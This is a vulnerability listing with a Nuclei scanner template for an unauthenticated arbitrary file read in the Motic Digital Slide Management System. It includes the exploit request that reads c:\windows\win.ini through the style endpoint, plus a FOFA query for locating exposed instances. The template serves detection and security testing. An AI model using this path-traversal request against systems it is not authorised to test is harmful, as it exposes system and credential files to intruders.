漏洞描述
Motic Digital Slide Management System style has an arbitrary file reading vulnerability. Unauthenticated attackers can exploit this vulnerability to read important system files, leaving the website in a highly insecure state.
motic-dsm-arbitrary-file-read: MoticDSM - Arbitrary File Read
PoC代码[已公开]
id: motic-dsm-arbitrary-file-read
info:
name: MoticDSM - Arbitrary File Read
author: s4e-io
severity: high
description: |
Motic Digital Slide Management System style has an arbitrary file reading vulnerability. Unauthenticated attackers can exploit this vulnerability to read important system files, leaving the website in a highly insecure state.
reference:
- https://blog.csdn.net/qq_41904294/article/details/141219553
- https://blog.csdn.net/weixin_44337800/article/details/141328430
metadata:
verified: true
max-request: 2
vendor: xiamen-motic
product: moticdsm
fofa-query: icon_hash="617142232"
tags: moticdsm,lfi,file-read,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /UploadService/Page/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"Motic")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /UploadService/Page/style?f=c:\windows\win.ini HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"bit app support","fonts","extensions")'
- 'contains(content_type,"text/css")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100e0461ba0a3ebef7a3f72ad9e629ebf741c86f644e00250a02115f51fc088b3c0022045ed4649ee01f406bbe38022e1523a89597a74b38f320eb0f052b937aae4be7c:922c64590222798bb761d5b6d8e72950